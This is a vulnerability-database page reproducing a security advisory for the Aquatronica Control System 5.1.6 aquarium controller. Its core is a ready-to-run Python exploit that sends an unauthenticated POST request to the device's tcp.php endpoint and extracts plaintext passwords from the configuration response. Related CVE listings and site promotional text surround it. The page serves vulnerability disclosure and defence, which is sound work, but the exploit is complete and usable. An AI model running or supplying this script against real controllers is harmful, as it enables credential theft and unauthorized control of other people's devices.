Lucene search
K

Aquatronica Control System 5.1.6 Passwords Leak Vulnerability

🗓️ 30 May 2024 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 276 Views

Aquatronica Control System 5.1.6 password leak vulnerability. Unauthenticated remote attackers can reveal sensitive information, including plaintext passwords, leading to unauthorized access and system manipulation.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-25037
20 Jun 202522:02
circl
CNNVD
Aquatronica Controller System 安全漏洞
20 Jun 202500:00
cnnvd
CVE
CVE-2025-25037
20 Jun 202518:35
cve
Cvelist
CVE-2025-25037 Aquatronica Controller System Complete Information Disclosure
20 Jun 202518:35
cvelist
EUVD
EUVD-2025-18781
3 Oct 202520:07
euvd
Nuclei
Aquatronica Controller System <= 5.1.6 - Information Disclosure
20 Jun 202603:02
nuclei
NVD
CVE-2025-25037
20 Jun 202519:15
nvd
Positive Technologies
PT-2025-26455
20 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-25037
23 Jun 202508:39
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-25037
20 Jun 202500:00
vulncheck_kev
Rows per page
<html><body><p>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
#                   Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
#            PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#

import requests, html, re, sys, time
from urllib.parse import unquote

program     = "TCP"
command     = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"

print("""
      _________         .    .
     (..       \_    ,  |\  /|
      \       O  \  /|  \ \/ /
       \______    \/ |   \  / 
          vvvv\    \ |   /  |
          \^^^^  ==   \_/   |
           `\_   ===    \.  |
           / /\_   \ /      |
           |/   \_  \|      /
___ ______________\________/________aquatronica_0day___
  | |
  | |
  | |
""")

if len(sys.argv) != 2:
    print("Usage: python aqua.py <ip:port>")
    sys.exit(1)

ip = sys.argv[1]
url = f"http://{ip}/{program.lower()}.php"

post_data = {'function_id' : function_id.lower(),
             'command'     :     command.upper()}

r = requests.post(url, data=post_data)

if r.status_code == 200:
    r_d = unquote(r.text)
    f_d_r = html.unescape(r_d)
    regex = r'pwd="([^"]+)"'
    rain = re.findall(regex, f_d_r)

    for drops in rain:
        print(' ',drops)
        time.sleep(0.5)
else:
    print(f"Dry season! {r.status_code}")
</ip:port></p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2024 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
EPSS0.01443
SSVC
276